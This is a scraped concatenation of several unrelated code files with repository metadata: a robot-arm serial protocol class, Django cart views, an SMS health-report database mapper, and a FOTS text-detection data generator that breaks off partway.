tempBuffer[-2] = temp &0xff
tempBuffer[-1] = temp>>8
return tempBuffer
#CRC校验
def checkCRC(self, receiveBuffer):
temp = 0x0000
for d in receiveBuffer:
temp = self.calculateCrc(temp, d)
return 1 if temp == 0 else 0
#计算要生成的CRC
def calculateCrc(self, crc, data):
data=(data^(crc&0xff))
data=data^(data << 4&0xff)
return (((data<<8)|((crc>>8)&0xff))^(data>>4))^(data<<3)
#错误日志
def error(self, code, message):
time = datetime.now()
self.errorLog.append({"time":time,"code":code, "mes":message})
#机械臂开、启动发送数据
def robotOpenData(self, text):
data = []
if text == "开":
for i in range(6):
data.append(b'\x02\x82')
data.append(b'\x03\x95\x40')
elif text == "启动":
for i in range(6):
data.append(b'\x02\x84')
data.append(b'\x03\x95\x40')
return data
#机械臂关闭发送数据
def robotCloseData(self):
data = []
for i in range(6):
data.append(b'\x02\x82')
data.append(b'\x03\x95\x40')
return data
#单轴关节旋转
def pressedJointMoveData(self, MoveJoint):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
if MoveJoint >0 and MoveJoint <= 3:
data[MoveJoint-1] = b'\x07\x0A\x00\x1F\xAE\x00\x00'
elif MoveJoint >3 and MoveJoint <= 6:
data[MoveJoint -1] = b'\x07\x0A\x00\x10\xE5\x00\x00'
elif MoveJoint <0 and MoveJoint >= -3:
data[abs(MoveJoint)-1] = b'\x07\x0A\xFF\xE0\x52\x00\x00'
elif MoveJoint <-3 and MoveJoint >= -6:
data[abs(MoveJoint)-1] = b'\x07\x0A\xFF\xEF\x1B\x00\x00'
return data
def releaseJointMoveData(self):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
return data
def singleRotateData(self, jointID, jointSpeed):
data = []
speed = b''
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
if jointID >= 0 and jointID < 3:
speed = struct.pack('>l', int(jointSpeed/0.0123291015625))[-3:]
elif jointID >= 3 and jointID < 6:
speed = struct.pack('>l', int(jointSpeed/0.02311706543))[-3:]
if speed != b'':
data[jointID] = b'\x07\x0A' + speed + b'\x00\x00'
return data
def stopSingleRotateData(self):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
return data
if __name__ == '__main__':
Rb = QxRobot()
recData = b'\x12\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x03\x95\x40\x71\x01'
transData = b'\x10\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x03\x95\x40'
recData = b'\x07\xFD\x2C\xD8\xDD\x63\xF1\x83\x84\x04\x10\x00\x00\x19\x63\x05\xD3\x5B'
# 48 0B 0B 29 53 79 B7 01 A4 80 05 02 0B 0B 00 00 00 00 00 00 00 FE DB 0B 0B 00 00 00 00 00 00 00 00 8E
# 0B 0B 00 00 00 00 00 00 00 FF C5 0B 0B 00 00 00 00 00 00 00 00 53 0B 0B 00 00 00 00 00 00 00 00 00
# 03 95 40 ED 03
sendBuffer = [ b'\x0B\x0B\x29\x53\x79\xB7\x01\xA4\x80\x05\x02',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\xFE\xDB',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x8E',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\xFF\xC5',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x53',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x03\x95\x40']
| [
"15010908626@163.com"
] | 15010908626@163.com |
ec3fd1acc220ef26c9dbc5e7a9ecd28e583e257d | 915f1c80b6b420926f337e2090ba50f91f7b9534 | /carts/views.py | ebee412dff143108136058b0d204570e782ed9b5 | [] | no_license | Paccy10/greatkart-django | 32f32a7f202c25b26abf37094b25bebf4f507261 | 51b8cb1f8303acb93cbd139c1d3fa93bdff3c093 | refs/heads/main | 2023-06-14T21:58:16.493382 | 2021-07-10T10:06:17 | 2021-07-10T10:06:17 | 378,876,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,155 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from store.models import Product, ProductVariation
from .models import Cart, CartItem
def cart(request, total=0, quantity=0, cart_items=None):
tax = 0
grand_total = 0
try:
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += cart_item.product.price * cart_item.quantity
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total
}
return render(request, 'store/cart.html', context)
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
current_user = request.user
product = Product.objects.get(id=product_id)
if current_user.is_authenticated:
product_variations = []
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = ProductVariation.objects.get(
variation__product=product, variation__name__iexact=key, value__iexact=value)
product_variations.append(variation)
except:
pass
is_cart_item_exists = CartItem.objects.filter(
product=product, user=current_user).exists()
if is_cart_item_exists:
cart_items = CartItem.objects.filter(
product=product, user=current_user)
ex_var_list = []
items_ids = []
for item in cart_items:
ex_var_list.append(list(item.variations.all()))
items_ids.append(item.id)
if product_variations in ex_var_list:
index = ex_var_list.index(product_variations)
item_id = items_ids[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(
product=product, quantity=1, user=current_user)
if len(product_variations) > 0:
item.variations.clear()
item.variations.add(*product_variations)
item.save()
else:
cart_item = CartItem.objects.create(
product=product, user=current_user, quantity=1)
if len(product_variations) > 0:
cart_item.variations.add(*product_variations)
cart_item.save()
return redirect('cart')
else:
product_variations = []
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = ProductVariation.objects.get(
variation__product=product, variation__name__iexact=key, value__iexact=value)
product_variations.append(variation)
except:
pass
try:
cart = Cart.objects.get(cart_id=_cart_id(request))
except Cart.DoesNotExist:
cart = Cart.objects.create(cart_id=_cart_id(request))
cart.save()
is_cart_item_exists = CartItem.objects.filter(
product=product, cart=cart).exists()
if is_cart_item_exists:
cart_items = CartItem.objects.filter(
product=product, cart=cart)
ex_var_list = []
items_ids = []
for item in cart_items:
ex_var_list.append(list(item.variations.all()))
items_ids.append(item.id)
if product_variations in ex_var_list:
index = ex_var_list.index(product_variations)
item_id = items_ids[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(
product=product, quantity=1, cart=cart)
if len(product_variations) > 0:
item.variations.clear()
item.variations.add(*product_variations)
item.save()
else:
cart_item = CartItem.objects.create(
product=product, cart=cart, quantity=1)
if len(product_variations) > 0:
cart_item.variations.add(*product_variations)
cart_item.save()
return redirect('cart')
def remove_cart(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
try:
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
if cart_item.quantity > 1:
cart_item.quantity -= 1
cart_item.save()
else:
cart_item.delete()
except:
pass
return redirect('cart')
def remove_cart_item(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
cart_item.delete()
return redirect('cart')
@login_required(login_url='login')
def checkout(request, total=0, quantity=0, cart_items=None):
tax = 0
grand_total = 0
try:
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += cart_item.product.price * cart_item.quantity
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total
}
return render(request, 'store/checkout.html', context)
| [
"pacifiqueclement@gmail.com"
] | pacifiqueclement@gmail.com |
ed7864fbc5faf9d58d3816537dbd833787832756 | fa124fdbf36327bf8e74bbc7f00ce448c1e7939a | /src/com/rwanda/mch/sms/api/messaging/zdmapper/mappers/cmrmapper.py | f97e94e932dc69ab661619c309d6cd2f1afa6449 | [] | no_license | pivotaccess2007/mch | 039f17cdb16b434c0a25504cc81b7db81e5da988 | 523d1cd706296744e17e85683b5dbedbc05dd9e6 | refs/heads/master | 2020-03-30T16:33:44.451275 | 2018-10-03T13:23:00 | 2018-10-03T13:23:00 | 151,414,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,019 | py | # vim: ai ts=4 sts=4 et sw=4
##
##
## @author UWANTWALI ZIGAMA Didier
## d.zigama@pivotaccess.com/zigdidier@gmail.com
##
from model.ccm import CCM
from sms.api.messaging.zdmapper.mappers.childmapper import Childmapper
from sms.api.messaging.zdmapper.mappers.ccmmapper import CCMmapper
import datetime
class CMRmapper(object):
""" CMR map the sms report appropriately to db columns structure """
def __init__(self, report):
self.cmr = CCM(report.nid, report.birth_date, report.child_number)
self.cmr.table = self.cmr.table2
self.__dict__.update(report.__dict__)
self.FIELDS = {}
self.child = Childmapper(report)
self.ccmmapper = CCMmapper(report)
def get_unique_query(self):
try:
self.child_pk = getattr(self, 'child_pk') if hasattr(self, 'child_pk') else None
self.ccm_pk = getattr(self, 'report_pk') if hasattr(self, 'report_pk') else None
self.curr_symptom_dict = {
'symptom_ib': self.codes(self.current_symptoms, 'ib'),
'symptom_db': self.codes(self.current_symptoms, 'db'),
'symptom_di': self.codes(self.current_symptoms, 'di'),
'symptom_ma': self.codes(self.current_symptoms, 'ma'),
'symptom_np': self.codes(self.current_symptoms, 'np'),
'symptom_oi': self.codes(self.current_symptoms, 'oi'),
'symptom_pc': self.codes(self.current_symptoms, 'pc'),
'symptom_nv': self.codes(self.current_symptoms, 'nv'),
}
self.UNIQUE_QUERY = self.filters_of_dict_keys(self.curr_symptom_dict)
self.UNIQUE_QUERY.update( {"child_pk = %s": self.child_pk })
if self.ccm_pk: self.UNIQUE_QUERY.update( {"ccm_pk = %s": self.ccm_pk })
except Exception, e:
print "UNIQUE CMR: %s" % e
return self
def get_fields(self):
try:
child = self.child.store()
self.child_pk = child.indexcol
self.mother_pk = child.mother_pk
self.pregnancy_pk = child.pregnancy_pk
self.health_status = getattr(self, 'child_status') if hasattr(self, 'child_status') else None
self.ccm_pk = getattr(self, 'report_pk') if hasattr(self, 'report_pk') else None
indexcol = None
self.get_unique_query()
#print self.UNIQUE_QUERY
cmr = self.cmr.get_cmr(self.UNIQUE_QUERY)
if cmr:
indexcol = cmr.indexcol
self.created_at = cmr.created_at
self.FIELDS.update(self.curr_symptom_dict)
self.FIELDS.update( {
'indexcol' : indexcol,
'created_at' : self.created_at,
'updated_at' : self.updated_at,
'national_id' : self.national_id,
'mother_pk': self.mother_pk,
'user_phone' : self.user_phone,
'user_pk' : self.user_pk,
'role_pk' : self.role_pk,
'nation_pk' : self.nation_pk,
'province_pk' : self.province_pk,
'district_pk' : self.district_pk,
'referral_facility_pk' : self.referral_facility_pk,
'facility_pk' : self.facility_pk,
'sector_pk' : self.sector_pk,
'cell_pk' : self.cell_pk,
'village_pk' : self.village_pk,
'birth_date' : self.birth_date,
'child_number' : self.child_number,
'pregnancy_pk' : self.pregnancy_pk,
'child_pk': self.child_pk,
'ccm_pk': self.ccm_pk,
'intervention': self.code(self.intervention),
'health_status': self.code(self.health_status),
'message' : self.message.text,
'is_valid': True
}
)
#print self.FIELDS
except Exception, e:
print "FIELDS CMR: %s" % e
pass
return self
def store(self):
try:
cmr = self.cmr.save_cmr(self.orm, self.get_fields())
return cmr
except Exception, e:
print "STORE CMR: %s" % e
pass
return None
| [
"zigdidier@gmail.com"
] | zigdidier@gmail.com |
3ac9d236c7a52f4c921b2b75b6a80d93ee63834b | e38c5c8d9a0ae12be0ca755720b7bad54bddf457 | /DataGenerator.py | 8d1475b20b65bb2be0d5d7ecefd6f1a3a40087cd | [] | no_license | Amlan-Gopal/fots | 0d242f4e166c9781695ee1534f2cd72b56c65870 | bff6fe258a46375831554262cad54dd9106d1141 | refs/heads/main | 2023-06-10T09:42:15.019113 | 2021-06-26T13:00:43 | 2021-06-26T13:00:43 | 380,490,450 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,730 | py | # Imports
import numpy as np
import os
import scipy.io
import glob
from tqdm import tqdm
import random
import pandas as pd
import pickle
import cv2
import time
import scipy.optimize
from shapely.geometry import Polygon
import tensorflow as tf
import math
import traceback
import warnings
warnings.filterwarnings("ignore")
#get_ipython().system('pip install Shapely')
# References
# https://github.com/jiangxiluning/FOTS.PyTorch/tree/master/FOTS
# https://github.com/Masao-Taketani/FOTS_OCR
class DataGenerator:
def __loadSynthImages(self):
"""Returns SynthText directory files"""
files = []
for root,dirs,file in os.walk('SampleSynth',topdown=True):
for i in file:
extn = i.split('.')[-1]
if extn != 'DS_Store' and extn!= 'mat':
path = root+os.sep+i
path = '/'.join(path.split('\\'))
files.append(path)
return files
def __loadICDARImages(self):
"""Returns ICDAR directory files"""
files = []
root = 'ch4_training_images'
for f in os.listdir(root):
files.append(root + '/' + f)
return files
def __loadAllSynthGT(self):
"""Loads gt.mat (Ground Truth values) and returns dictinary containing image path,
bounding box cordinates and contained text"""
with open('SampleSynth/synth_gt.txt', 'rb') as f:
data = f.read()
synth_gt = pickle.loads(data)
return synth_gt
def __loadGT_Synth(self, imgPath, synth_dict= {}):
"""For a given Synth image path, it returns the bounding box cordinates and texts"""
# Check the dictinary
if len(synth_dict) == 0:
raise Exception('Synth GT is empty!!')
else:
# Collect bounding box cordinates and texts for a given index
if imgPath in synth_dict['imname']:
index = synth_dict['imname'].index(imgPath)
bboxes = synth_dict['wordBB'][index]
texts = synth_dict['txt'][index]
_, _, numOfWords = bboxes.shape
# Change shape from (2, 4, number of boxes) to (number of boxes, 4, 2)
bboxes = bboxes.reshape([8, numOfWords], order = 'F').T # num_words * 8
bboxes = bboxes.reshape(numOfWords, 4, 2) # num_of_words * 4 * 2
texts = np.array([word for line in texts for word in line.split()])
return bboxes, texts
return None, None
def __textTagsCounts_ICDAR(self):
"""It will return count of all the texts in the data"""
textTags = []
for file in os.listdir('ch4_training_localization_transcription_gt'):
path = 'ch4_training_localization_transcription_gt' + '/' + file
with open(path, 'r', encoding='utf-8-sig') as f:
# Split the lines for each bouning box
lines = f.read().split('\n')
texts = [''.join(line.split(',')[8:]) for line in lines if line]
# Check for invalid texts
textTags.extend([word for line in texts for word in line.split() if not (word == '*' or word == '###')])
return len(set(textTags))
def __loadGT_ICDAR(self, imgPath):
"""For a given ICDAR image path, it returns the bounding box cordinates and texts"""
# Generate file path from image path
path=imgPath.split('/')[-1]
path=path.replace('jpg','txt')
path=path.replace('png','txt')
path=path.replace('jpeg','txt')
path = 'ch4_training_localization_transcription_gt/gt_' + path
with open(path, 'r', encoding='utf-8-sig') as f:
# Split the lines for each bouning box
lines = f.read().split('\n')
# get bounidng box cordinates
bboxes = []
# Get cordinate values and convert them to (4,2) shapes each
bbox_cords = [line.split(',')[:8] for line in lines if line]
for bbox_cord in bbox_cords:
x1, y1, x2, y2, x3, y3, x4, y4 = bbox_cord
bbox = [[x1, y1], [x2, y2], [x3, y3], [x4, y4]]
bboxes.append(bbox)
# Extract text
texts = [''.join(line.split(',')[8:]) for line in lines if line]
# Check for invalid texts
texts = [None if(word == '*' or word == '###') else word for line in texts for word in line.split()]
return np.array(bboxes, dtype=np.float32), np.array(texts)
def __polygon_area(self, poly):
"""Returns area for polygon coordinates"""
edge = [
(poly[1][0] - poly[0][0]) * (poly[1][1] + poly[0][1]),
(poly[2][0] - poly[1][0]) * (poly[2][1] + poly[1][1]),
(poly[3][0] - poly[2][0]) * (poly[3][1] + poly[2][1]),
(poly[0][0] - poly[3][0]) * (poly[0][1] + poly[3][1])
]
return np.sum(edge)/2
def __check_and_validate_polys(self, polys, tags, h_w):
"""Given polys and tags with image height width, return the valid polys and coresponding tags"""
(h, w) = h_w
if polys.shape[0] == 0:
return polys
polys[:, :, 0] = np.clip(polys[:, :, 0], 0, w - 1)
polys[:, :, 1] = np.clip(polys[:, :, 1], 0, h - 1)
validated_polys = []
validated_tags = []
for poly, tag in zip(polys, tags):
p_area = self.__polygon_area(poly)
if abs(p_area) < 1:
continue
if p_area > 0:
poly = poly[(0, 3, 2, 1), :]
validated_polys.append(poly)
validated_tags.append(tag)
return np.array(validated_polys), np.array(validated_tags)
def __shrink_poly(self, poly, r):
"""Create inner/shrink poly inside given poly for score map"""
R = 0.3 # shrink ratio
# find the longer pair
if np.linalg.norm(poly[0] - poly[1]) + np.linalg.norm(poly[2] - poly[3]) > np.linalg.norm(poly[0] - poly[3]) + np.linalg.norm(poly[1] - poly[2]):
# first move (p0, p1), (p2, p3), then (p0, p3), (p1, p2)
## p0, p1
theta = np.arctan2((poly[1][1] - poly[0][1]), (poly[1][0] - poly[0][0]))
poly[0][0] += R * r[0] * np.cos(theta)
poly[0][1] += R * r[0] * np.sin(theta)
poly[1][0] -= R * r[1] * np.cos(theta)
poly[1][1] -= R * r[1] * np.sin(theta)
## p2, p3
theta = np.arctan2((poly[2][1] - poly[3][1]), (poly[2][0] - poly[3][0]))
poly[3][0] += R * r[3] * np.cos(theta)
poly[3][1] += R * r[3] * np.sin(theta)
poly[2][0] -= R * r[2] * np.cos(theta)
poly[2][1] -= R * r[2] * np.sin(theta)
## p0, p3
theta = np.arctan2((poly[3][0] - poly[0][0]), (poly[3][1] - poly[0][1]))
poly[0][0] += R * r[0] * np.sin(theta)
poly[0][1] += R * r[0] * np.cos(theta)
poly[3][0] -= R * r[3] * np.sin(theta)
poly[3][1] -= R * r[3] * np.cos(theta)
## p1, p2
theta = np.arctan2((poly[2][0] - poly[1][0]), (poly[2][1] - poly[1][1]))
poly[1][0] += R * r[1] * np.sin(theta)
poly[1][1] += R * r[1] * np.cos(theta)
poly[2][0] -= R * r[2] * np.sin(theta)
poly[2][1] -= R * r[2] * np.cos(theta)
else:
## p0, p3
# print poly
theta = np.arctan2((poly[3][0] - poly[0][0]), (poly[3][1] - poly[0][1]))
poly[0][0] += R * r[0] * np.sin(theta)
poly[0][1] += R * r[0] * np.cos(theta)
poly[3][0] -= R * r[3] * np.sin(theta)
poly[3][1] -= R * r[3] * np.cos(theta)
## p1, p2
theta = np.arctan2((poly[2][0] - poly[1][0]), (poly[2][1] - poly[1][1]))
poly[1][0] += R * r[1] * np.sin(theta)
poly[1][1] += R * r[1] * np.cos(theta)
poly[2][0] -= R * r[2] * np.sin(theta)
poly[2][1] -= R * r[2] * np.cos(theta)
## p0, p1
theta = np.arctan2((poly[1][1] - poly[0][1]), (poly[1][0] - poly[0][0]))
poly[0][0] += R * r[0] * np.cos(theta)
poly[0][1] += R * r[0] * np.sin(theta)
poly[1][0] -= R * r[1] * np.cos(theta)
poly[1][1] -= R * r[1] * np.sin(theta)
## p2, p3
theta = np.arctan2((poly[2][1] - poly[3][1]), (poly[2][0] - poly[3][0]))
poly[3][0] += R * r[3] * np.cos(theta)
poly[3][1] += R * r[3] * np.sin(theta)
poly[2][0] -= R * r[2] * np.cos(theta)
poly[2][1] -= R * r[2] * np.sin(theta)
return poly
def __point_dist_to_line(self, p1, p2, p3):
"""compute the distance from p3 to p1-p2"""
return np.linalg.norm(np.cross(p2 - p1, p1 - p3)) / np.linalg.norm(p2 - p1)
def __fit_line(self, p1, p2):
"""fit a line ax+by+c=0"""
if p1[0] == p1[1]:
return [1., 0., -p1[0]]
else:
[k, b] = np.polyfit(p1, p2, deg=1)
return [k, -1., b]
def __line_cross_point(self, line1, line2):
"""Return the cross point of given line1 and line2 (line ax+by+c=0)"""
if line1[0] != 0 and line1[0] == line2[0]:
print('Cross point does not exist')
return None
if line1[0] == 0 and line2[0] == 0:
print('Cross point does not exist')
return None
if line1[1] == 0:
x = -line1[2]
y = line2[0] * x + line2[2]
elif line2[1] == 0:
x = -line2[2]
y = line1[0] * x + line1[2]
else:
k1, _, b1 = line1
k2, _, b2 = line2
x = -(b1-b2)/(k1-k2)
y = k1*x + b1
return np.array([x, y], dtype=np.float32)
def __line_verticle(self, line, point):
"""get the verticle line from line across point"""
if line[1] == 0:
verticle = [0, -1, point[1]]
else:
if line[0] == 0:
verticle = [1, 0, -point[0]]
else:
verticle = [-1./line[0], -1, point[1] - (-1/line[0] * point[0])]
return verticle
def __rectangle_from_parallelogram(self, poly):
"""Create a rectangle from a parallelogram"""
p0, p1, p2, p3 = poly
angle_p0 = np.arccos(np.dot(p1-p0, p3-p0)/(np.linalg.norm(p0-p1) * np.linalg.norm(p3-p0)))
if angle_p0 < 0.5 * np.pi:
if np.linalg.norm(p0 - p1) > np.linalg.norm(p0-p3):
# p0 and p2
## p0
p2p3 = self.__fit_line([p2[0], p3[0]], [p2[1], p3[1]])
p2p3_verticle = self.__line_verticle(p2p3, p0)
new_p3 = self.__line_cross_point(p2p3, p2p3_verticle)
## p2
p0p1 = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
p0p1_verticle = self.__line_verticle(p0p1, p2)
new_p1 = self.__line_cross_point(p0p1, p0p1_verticle)
return np.array([p0, new_p1, p2, new_p3], dtype=np.float32)
else:
p1p2 = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
p1p2_verticle = self.__line_verticle(p1p2, p0)
new_p1 = self.__line_cross_point(p1p2, p1p2_verticle)
p0p3 = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
p0p3_verticle = self.__line_verticle(p0p3, p2)
new_p3 = self.__line_cross_point(p0p3, p0p3_verticle)
return np.array([p0, new_p1, p2, new_p3], dtype=np.float32)
else:
if np.linalg.norm(p0-p1) > np.linalg.norm(p0-p3):
# p1 and p3
## p1
p2p3 = self.__fit_line([p2[0], p3[0]], [p2[1], p3[1]])
p2p3_verticle = self.__line_verticle(p2p3, p1)
new_p2 = self.__line_cross_point(p2p3, p2p3_verticle)
## p3
p0p1 = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
p0p1_verticle = self.__line_verticle(p0p1, p3)
new_p0 = self.__line_cross_point(p0p1, p0p1_verticle)
return np.array([new_p0, p1, new_p2, p3], dtype=np.float32)
else:
p0p3 = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
p0p3_verticle = self.__line_verticle(p0p3, p1)
new_p0 = self.__line_cross_point(p0p3, p0p3_verticle)
p1p2 = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
p1p2_verticle = self.__line_verticle(p1p2, p3)
new_p2 = self.__line_cross_point(p1p2, p1p2_verticle)
return np.array([new_p0, p1, new_p2, p3], dtype=np.float32)
def __sort_rectangle(self, poly):
"""sort the four coordinates of the polygon, points in poly should be sorted clockwise"""
# First find the lowest point
p_lowest = np.argmax(poly[:, 1])
if np.count_nonzero(poly[:, 1] == poly[p_lowest, 1]) == 2:
# if the bottom line is parallel to x-axis, then p0 must be the upper-left corner
p0_index = np.argmin(np.sum(poly, axis=1))
p1_index = (p0_index + 1) % 4
p2_index = (p0_index + 2) % 4
p3_index = (p0_index + 3) % 4
return poly[[p0_index, p1_index, p2_index, p3_index]], 0.
else:
# find the point that sits right to the lowest point
p_lowest_right = (p_lowest - 1) % 4
p_lowest_left = (p_lowest + 1) % 4
angle = np.arctan(-(poly[p_lowest][1] - poly[p_lowest_right][1])/(poly[p_lowest][0] - poly[p_lowest_right][0]))
# assert angle > 0
if angle <= 0:
print(angle, poly[p_lowest], poly[p_lowest_right])
if angle/np.pi * 180 > 45:
#this point is p2
p2_index = p_lowest
p1_index = (p2_index - 1) % 4
p0_index = (p2_index - 2) % 4
p3_index = (p2_index + 1) % 4
return poly[[p0_index, p1_index, p2_index, p3_index]], -(np.pi/2 - angle)
else:
# this point is p3
p3_index = p_lowest
p0_index = (p3_index + 1) % 4
p1_index = (p3_index + 2) % 4
p2_index = (p3_index + 3) % 4
return poly[[p0_index, p1_index, p2_index, p3_index]], angle
def __restore_rectangle_rbox(self, origin, geometry):
"""Resotre rectangle tbox"""
d = geometry[:, :4]
angle = geometry[:, 4]
# for angle > 0
origin_0 = origin[angle >= 0]
d_0 = d[angle >= 0]
angle_0 = angle[angle >= 0]
if origin_0.shape[0] > 0:
p = np.array([np.zeros(d_0.shape[0]), -d_0[:, 0] - d_0[:, 2],
d_0[:, 1] + d_0[:, 3], -d_0[:, 0] - d_0[:, 2],
d_0[:, 1] + d_0[:, 3], np.zeros(d_0.shape[0]),
np.zeros(d_0.shape[0]), np.zeros(d_0.shape[0]),
d_0[:, 3], -d_0[:, 2]])
p = p.transpose((1, 0)).reshape((-1, 5, 2)) # N*5*2
rotate_matrix_x = np.array([np.cos(angle_0), np.sin(angle_0)]).transpose((1, 0))
rotate_matrix_x = np.repeat(rotate_matrix_x, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1)) # N*5*2
rotate_matrix_y = np.array([-np.sin(angle_0), np.cos(angle_0)]).transpose((1, 0))
rotate_matrix_y = np.repeat(rotate_matrix_y, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))
p_rotate_x = np.sum(rotate_matrix_x * p, axis=2)[:, :, np.newaxis] # N*5*1
p_rotate_y = np.sum(rotate_matrix_y * p, axis=2)[:, :, np.newaxis] # N*5*1
p_rotate = np.concatenate([p_rotate_x, p_rotate_y], axis=2) # N*5*2
p3_in_origin = origin_0 - p_rotate[:, 4, :]
new_p0 = p_rotate[:, 0, :] + p3_in_origin # N*2
new_p1 = p_rotate[:, 1, :] + p3_in_origin
new_p2 = p_rotate[:, 2, :] + p3_in_origin
new_p3 = p_rotate[:, 3, :] + p3_in_origin
new_p_0 = np.concatenate([new_p0[:, np.newaxis, :], new_p1[:, np.newaxis, :],
new_p2[:, np.newaxis, :], new_p3[:, np.newaxis, :]], axis=1) # N*4*2
else:
new_p_0 = np.zeros((0, 4, 2))
# for angle < 0
origin_1 = origin[angle < 0]
d_1 = d[angle < 0]
angle_1 = angle[angle < 0]
if origin_1.shape[0] > 0:
p = np.array([-d_1[:, 1] - d_1[:, 3], -d_1[:, 0] - d_1[:, 2],
np.zeros(d_1.shape[0]), -d_1[:, 0] - d_1[:, 2],
np.zeros(d_1.shape[0]), np.zeros(d_1.shape[0]),
-d_1[:, 1] - d_1[:, 3], np.zeros(d_1.shape[0]),
-d_1[:, 1], -d_1[:, 2]])
p = p.transpose((1, 0)).reshape((-1, 5, 2)) # N*5*2
rotate_matrix_x = np.array([np.cos(-angle_1), -np.sin(-angle_1)]).transpose((1, 0))
rotate_matrix_x = np.repeat(rotate_matrix_x, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1)) # N*5*2
rotate_matrix_y = np.array([np.sin(-angle_1), np.cos(-angle_1)]).transpose((1, 0))
rotate_matrix_y = np.repeat(rotate_matrix_y, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))
p_rotate_x = np.sum(rotate_matrix_x * p, axis=2)[:, :, np.newaxis] # N*5*1
p_rotate_y = np.sum(rotate_matrix_y * p, axis=2)[:, :, np.newaxis] # N*5*1
p_rotate = np.concatenate([p_rotate_x, p_rotate_y], axis=2) # N*5*2
p3_in_origin = origin_1 - p_rotate[:, 4, :]
new_p0 = p_rotate[:, 0, :] + p3_in_origin # N*2
new_p1 = p_rotate[:, 1, :] + p3_in_origin
new_p2 = p_rotate[:, 2, :] + p3_in_origin
new_p3 = p_rotate[:, 3, :] + p3_in_origin
new_p_1 = np.concatenate([new_p0[:, np.newaxis, :], new_p1[:, np.newaxis, :],
new_p2[:, np.newaxis, :], new_p3[:, np.newaxis, :]], axis=1) # N*4*2
else:
new_p_1 = np.zeros((0, 4, 2))
return np.concatenate([new_p_0, new_p_1])
def restore_rectangle(self, origin, geometry):
return self.__restore_rectangle_rbox(origin, geometry)
#These Functions are used to Generate ROI params like out box,crop box & angles that we use to crop text from image
def __generate_roiRotatePara(self, box, angle, expand_w = 60):
"""Generate all ROI Parameterts"""
p0_rect, p1_rect, p2_rect, p3_rect = box
cxy = (p0_rect + p2_rect) / 2.
size = np.array([np.linalg.norm(p0_rect - p1_rect), np.linalg.norm(p0_rect - p3_rect)])
rrect = np.concatenate([cxy, size])
box=np.array(box)
points=np.array(box, dtype=np.int32)
xmin=np.min(points[:,0])
xmax=np.max(points[:,0])
ymin=np.min(points[:,1])
ymax=np.max(points[:,1])
bbox = np.array([xmin, ymin, xmax, ymax])
if np.any(bbox < -expand_w):
return None
rrect[:2] -= bbox[:2]
rrect[:2] -= rrect[2:] / 2
rrect[2:] += rrect[:2]
bbox[2:] -= bbox[:2]
rrect[::2] = np.clip(rrect[::2], 0, bbox[2])
rrect[1::2] = np.clip(rrect[1::2], 0, bbox[3])
rrect[2:] -= rrect[:2]
return bbox.astype(np.int32), rrect.astype(np.int32), - angle
def restore_roiRotatePara(self, box):
rectange, rotate_angle = self.__sort_rectangle(box)
return self.__generate_roiRotatePara(rectange, rotate_angle)
#This function is used to generate geo_map,score_map, training_mask,corp_box,out_box,angle that we use while training model
